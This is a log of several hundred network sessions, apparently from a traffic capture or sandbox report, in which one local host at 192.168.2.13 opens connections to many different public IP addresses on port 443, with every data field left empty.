                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16654192.168.2.1347884192.41.12.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16655192.168.2.1358666166.69.99.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16656192.168.2.1339652165.75.60.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16657192.168.2.1341652211.45.252.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16658192.168.2.1341746128.134.4.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16659192.168.2.1348708145.46.27.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16660192.168.2.1338998118.65.124.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16661192.168.2.1351810105.217.199.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16662192.168.2.1349710177.17.83.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16663192.168.2.1345054175.211.186.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16664192.168.2.133456850.149.34.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16665192.168.2.1358906158.248.63.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16666192.168.2.133571488.162.235.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16667192.168.2.133798678.128.31.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16668192.168.2.135916639.94.160.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16669192.168.2.1356200209.255.128.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16670192.168.2.135464252.235.165.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16671192.168.2.1360236115.222.169.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16672192.168.2.1337610130.115.246.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16673192.168.2.1341156112.124.31.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16674192.168.2.1346370133.89.34.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16675192.168.2.1335466212.164.166.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16676192.168.2.1346748183.68.143.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16677192.168.2.1341024122.121.130.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16678192.168.2.1360228196.223.199.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16679192.168.2.1333510152.103.251.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16680192.168.2.1346580179.216.93.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16681192.168.2.1354346141.56.91.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16682192.168.2.1333148218.33.45.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16683192.168.2.135531025.171.169.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16684192.168.2.133295652.249.240.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16685192.168.2.1339440178.166.28.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16686192.168.2.1347966218.134.52.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16687192.168.2.1353184121.166.170.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16688192.168.2.1352678170.170.205.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16689192.168.2.1352864193.133.134.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16690192.168.2.136063066.241.100.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16691192.168.2.134145412.40.201.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16692192.168.2.1344440144.74.227.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16693192.168.2.134607049.137.126.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16694192.168.2.1335764168.172.170.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16695192.168.2.13446502.13.33.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16696192.168.2.1355234140.39.254.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16697192.168.2.1349722178.74.223.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16698192.168.2.1350736186.244.226.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16699192.168.2.1355260197.84.184.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16700192.168.2.134193661.102.34.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16701192.168.2.1338876113.57.64.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16702192.168.2.1360558204.63.21.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16703192.168.2.1354632147.188.143.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16704192.168.2.1338808139.164.190.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16705192.168.2.1339166204.253.168.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16706192.168.2.1333804148.24.222.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16707192.168.2.1349116177.200.73.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16708192.168.2.1337742158.96.233.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16709192.168.2.1335668108.189.102.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16710192.168.2.133715657.117.104.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16711192.168.2.1345162136.216.31.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16712192.168.2.134970460.155.120.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16713192.168.2.134288849.58.237.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16714192.168.2.1332922154.41.153.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16715192.168.2.1340308105.103.181.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16716192.168.2.136081246.246.0.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16717192.168.2.1333934138.188.143.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16718192.168.2.1343976180.43.182.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16719192.168.2.134986454.197.123.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16720192.168.2.1348650100.63.200.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16721192.168.2.1355476144.127.74.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16722192.168.2.1333172164.253.190.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16723192.168.2.134547090.84.81.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16724192.168.2.1340910188.139.118.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16725192.168.2.1350508122.160.105.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16726192.168.2.135100690.8.110.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16727192.168.2.1345368130.19.65.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16728192.168.2.1353166163.232.80.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16729192.168.2.1338732219.12.225.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16730192.168.2.1349536167.33.156.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16731192.168.2.1338996144.214.5.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16732192.168.2.133749243.221.204.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16733192.168.2.1344164180.190.167.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16734192.168.2.1359184177.33.53.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16735192.168.2.134564491.191.253.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16736192.168.2.1359438157.231.243.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16737192.168.2.1351008142.101.162.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16738192.168.2.134009265.85.95.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16739192.168.2.134199471.51.84.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16740192.168.2.1358154143.40.201.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16741192.168.2.1354910212.88.52.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16742192.168.2.1355160221.134.162.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16743192.168.2.134262212.80.112.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16744192.168.2.1340786157.56.192.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16745192.168.2.1333372192.73.24.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16746192.168.2.1335652203.34.227.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16747192.168.2.1342358202.41.197.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16748192.168.2.133446897.224.189.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16749192.168.2.134092076.16.159.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16750192.168.2.135228820.169.53.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16751192.168.2.1356686174.129.94.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16752192.168.2.1349884171.212.126.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16753192.168.2.1351648147.45.72.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16754192.168.2.135184494.228.80.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16755192.168.2.1358538178.180.85.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16756192.168.2.1356420177.122.197.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16757192.168.2.135246223.92.87.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16758192.168.2.136036643.244.42.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16759192.168.2.1348648109.227.203.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16760192.168.2.1341332147.194.109.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16761192.168.2.1333264123.38.250.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16762192.168.2.1340538115.110.244.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16763192.168.2.134865888.57.79.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16764192.168.2.1348638212.19.129.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16765192.168.2.135273253.220.143.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16766192.168.2.13374304.210.174.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16767192.168.2.13350504.49.205.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16768192.168.2.135485897.62.104.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16769192.168.2.1335778111.117.59.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16770192.168.2.1348230194.9.207.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16771192.168.2.1355860187.111.221.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16772192.168.2.134732627.23.67.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16773192.168.2.1339598212.241.35.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16774192.168.2.1337672149.140.252.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16775192.168.2.1333488135.163.242.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16776192.168.2.135729263.252.0.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16777192.168.2.134402492.103.203.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16778192.168.2.133752827.184.3.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16779192.168.2.1340770184.202.168.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16780192.168.2.135294841.141.96.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16781192.168.2.1336898141.75.227.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16782192.168.2.135951686.87.42.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16783192.168.2.1351072138.195.36.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16784192.168.2.134709299.162.242.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16785192.168.2.134172067.149.207.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16786192.168.2.133951265.156.188.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16787192.168.2.134996671.66.76.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16788192.168.2.134448477.167.143.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16789192.168.2.1337378158.182.141.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16790192.168.2.1341304187.170.185.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16791192.168.2.133801278.186.21.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16792192.168.2.134489063.40.34.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16793192.168.2.1353450172.208.75.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16794192.168.2.1359094204.10.86.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16795192.168.2.1355690174.9.210.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16796192.168.2.1355828160.93.15.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16797192.168.2.1360502110.168.204.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16798192.168.2.135456084.220.34.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16799192.168.2.133360064.67.69.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16800192.168.2.13489225.163.236.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16801192.168.2.1339156114.240.70.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16802192.168.2.135489074.249.139.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16803192.168.2.1338666157.197.156.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16804192.168.2.1353516176.109.186.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16805192.168.2.133395635.249.104.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16806192.168.2.1344640150.170.159.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16807192.168.2.1348126134.65.118.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16808192.168.2.13469329.133.2.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16809192.168.2.135914438.222.141.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16810192.168.2.1348564133.13.206.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16811192.168.2.1355880122.246.23.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16812192.168.2.1359610182.71.111.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16813192.168.2.1339016140.162.48.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16814192.168.2.133560070.149.125.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16815192.168.2.135749257.183.245.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16816192.168.2.1351886100.250.84.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16817192.168.2.135857444.55.241.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16818192.168.2.1359112183.159.180.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16819192.168.2.1351542152.139.42.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16820192.168.2.1341046152.82.198.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16821192.168.2.1342530222.251.102.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16822192.168.2.1357218181.144.64.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16823192.168.2.1349378193.167.61.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16824192.168.2.1339470123.76.61.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16825192.168.2.1337220133.35.215.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16826192.168.2.1348268143.170.55.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16827192.168.2.134417287.222.19.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16828192.168.2.1343868117.206.136.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16829192.168.2.1352648190.177.69.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16830192.168.2.1355902175.143.217.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16831192.168.2.1334124162.13.188.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16832192.168.2.1352322150.140.102.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16833192.168.2.1343314168.182.228.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16834192.168.2.135556869.255.252.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16835192.168.2.134746050.76.182.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16836192.168.2.1350136213.38.91.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16837192.168.2.134922674.101.59.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16838192.168.2.1342822196.225.171.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16839192.168.2.1350612164.38.36.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16840192.168.2.1358580196.233.175.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16841192.168.2.133979812.240.145.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16842192.168.2.1353380132.38.223.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16843192.168.2.1333536193.77.32.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16844192.168.2.1340876122.232.206.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16845192.168.2.135100463.82.228.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16846192.168.2.1333352142.124.2.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16847192.168.2.134248638.160.131.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16848192.168.2.135516846.193.211.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16849192.168.2.1355768181.205.240.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16850192.168.2.1336908143.206.147.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16851192.168.2.133760439.184.121.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16852192.168.2.1351432193.89.179.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16853192.168.2.1358316126.216.112.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16854192.168.2.135075419.21.253.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16855192.168.2.1342934164.60.113.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16856192.168.2.1335324133.224.147.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16857192.168.2.13518849.184.81.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16858192.168.2.133863076.152.173.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16859192.168.2.1338704172.41.134.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16860192.168.2.134706839.6.125.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16861192.168.2.135437090.159.241.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16862192.168.2.135764468.28.140.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16863192.168.2.134710073.250.43.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16864192.168.2.1346094173.85.102.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16865192.168.2.133299845.42.204.10443
                                                  TimestampBytes transferredDirectionData


